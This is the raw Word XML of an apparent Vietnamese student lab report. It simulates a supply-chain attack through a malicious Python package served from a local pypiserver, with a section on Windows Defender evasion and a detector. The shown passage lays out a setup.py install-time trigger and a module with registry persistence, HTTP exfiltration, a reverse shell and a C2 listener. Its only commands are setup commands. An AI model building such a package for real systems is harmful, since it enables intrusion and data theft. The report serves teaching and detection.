              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FA251E8" w14:textId="4921994D"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82" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.2 — Giới hạn của detector và hướng cải tiến</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470582 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="212D08BA" w14:textId="748878C8"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83" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.3 — Cách chạy Detector  và kết quả phát hiện</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470583 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41BBEEB6" w14:textId="175CF6E1"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85" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.4 — Demo vòng đời: Phát hiện → Ứng phó → Xác nhận</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470585 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61C1A4B7" w14:textId="62104FEC" w:rsidR="00C44D2D" w:rsidRDefault="00C44D2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470586" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>V. KẾT LUẬN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470586 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CD8F032" w14:textId="1FA6C76B" w:rsidR="00C44D2D" w:rsidRDefault="00C44D2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470587" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 — Những gì nhóm đã chứng minh được</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470587 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="074DC2E2" w14:textId="0983A7B4" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4D3A1013" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc227470563"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I. MỤC ĐÍCH VÀ BỐI CẢNH ĐỀ TÀI S04</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="478776AE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Đề tài S04 yêu cầu sinh viên hiểu và mô phỏng kịch bản tấn công chuỗi cung ứng phần mềm (Supply Chain Compromise) — một trong những hình thức tấn công nguy hiểm nhất trong thực tế hiện đại. Các sự kiện như SolarWinds 2020 hay XZ Utils backdoor 2024 cho thấy attacker không cần phá vỡ hệ thống phòng thủ trực tiếp — chỉ cần đặt mã độc vào đúng điểm mà nạn nhân tin tưởng: dependency phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0B985" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7239E1A7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Yêu cầu của đề bài gồm 3 phần:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3192C8AB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Phần A (4.0đ): Triển khai PoC mô phỏng cách thức hoạt động của malware sử dụng kỹ thuật supply chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67290B7B" w14:textId="06730879" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phần B (2.0đ): </w:t>
      </w:r>
      <w:r w:rsidR="00031A18" w:rsidRPr="00031A18">
        <w:t xml:space="preserve">Quan sát và đánh giá khả năng tránh bị phát hiện (Evasion) của payload đối với cấu hình Windows Defender </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA52D7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Phần C (4.0đ): Viết công cụ CÓ KHẢ NĂNG phát hiện kỹ thuật tương ứng mà malware sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38BDD3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D71894" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gợi ý thực hiện của đề: </w:t>
      </w:r>
      <w:r>
        <w:t>Tạo package giả (pypi/npm/apt) chứa marker behavior; Tạo/thiết lập private registry hoặc local index cho pip; mô phỏng publish và consumption. Tùy chọn: mô phỏng CI pipeline bị inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD69FD5"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6C71FB65" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="46BEA5D1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Lý do triển khai payload thực thay vì chỉ marker vô hại</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AEC0B16" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>Tiêu chí B yêu cầu chứng minh bypass Defender. Nếu payload chỉ ghi một file .txt thì Defender đương nhiên không cảnh báo — vì không có hành vi độc hại để bypass. Bằng chứng bypass chỉ có giá trị khi payload thực hiện hành vi mà AV được thiết kế để phát hiện: kết nối outbound về C2, data exfiltration, spawn shell — và AV vẫn im lặng. Toàn bộ thực nghiệm được thực hiện trong môi trường máy ảo VMware, mạng host-only, không kết nối internet thật.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BC63891" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E74FBA7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phạm vi giới hạn của PoC: </w:t>
      </w:r>
      <w:r>
        <w:t>PoC này tập trung vào cơ chế supply chain trigger (install-time execution) và reverse shell C2. Các hành vi nâng cao như credential harvesting, lateral movement, hay encrypted C2 nằm ngoài phạm vi đề tài môn học nhưng được thừa nhận là tồn tại trong malware supply chain thực tế (SolarWinds SUNBURST, XZ Utils).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6FB93" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304E224D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="5" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4086AD07" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc227470564"/>
      <w:r>
        <w:t>II. PHẦN A — TRIỂN KHAI PoC KỸ THUẬT (4.0 điểm)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="09A8C335" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A557DAE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc227470565"/>
      <w:r>
        <w:t>A.1 — Chuẩn bị môi trường phát triển Python trên Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2CC3433F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Bước đầu tiên, nhóm chuẩn bị môi trường build trên máy Ubuntu. Hệ thống cài python3-venv, tạo virtual environment và kích hoạt trước khi cài các công cụ cần thiết gồm pip, setuptools, wheel và pypiserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F782DB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0763E387" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lý do dùng virtual environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1C6EF6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Cô lập môi trường build khỏi hệ thống Python chính — tránh xung đột phiên bản thư viện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9A0B1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bảo đảm tái hiện được kết quả trong mọi lần chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF69187" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Phản ánh đúng cách developer thực sự build package trước khi publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243998C0" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A5B3C6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo apt install -y python3-venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE8B57" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>python3 -m venv myenv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6495B1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>source myenv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFA8B4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pip install --upgrade pip setuptools wheel pypiserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690887EA" w14:textId="77777777" w:rsidR="002D1355" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB98E98" w14:textId="7F9ACC8D" w:rsidR="002D1355" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="70A62AD7" wp14:editId="31C6706B">
            <wp:extent cx="5731200" cy="24384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
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2438400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7031CC47" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc227470566"/>
      <w:r>
        <w:t>A.2 — Khởi tạo cấu trúc package PoC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4176B641" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Nhóm tạo thư mục dự án s04-package-poc và xây dựng cấu trúc package con safe_demo_pkg theo đúng chuẩn Python packaging. So với phiên bản đầu, cấu trúc được bổ sung thêm c2_server.py và welcome.html phục vụ cho true exfiltration và giao diện pypiserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023ABC33" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2252A92D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ý nghĩa từng thành phần:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830E31D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>setup.py — Bộ mô tả package và cấu hình build. Đây là file bị lợi dụng để nhúng module-level trigger (xem A.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6685B01E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>marker.py — Chứa toàn bộ logic: persistence registry, true exfiltration qua HTTP POST và reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C24DE9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>__init__.py — Khai báo package hợp lệ, điểm import dẫn vào run_marker()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633A36A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>c2_server.py — Script chạy trên Ubuntu để nhận dữ liệu exfiltration qua port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610BCBA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>welcome.html — Trang chào cho pypiserver, hiển thị lệnh pip install chuẩn với --index-url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24ED48" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>dist/ — Thư mục chứa artifact .tar.gz sau khi build, được pypiserver phục vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFC875" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAA2086" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p ~/s04-package-poc/safe_demo_pkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE7D5B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cd ~/s04-package-poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C139B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6458EB69" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s04-package-poc/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424C0DA3" w14:textId="1DCFE532" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>├── c2_server.py          # HTTP server hứng exfil data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3EEAB" w14:textId="1DA6A9E1" w:rsidR="004D4D10" w:rsidRDefault="00000000">
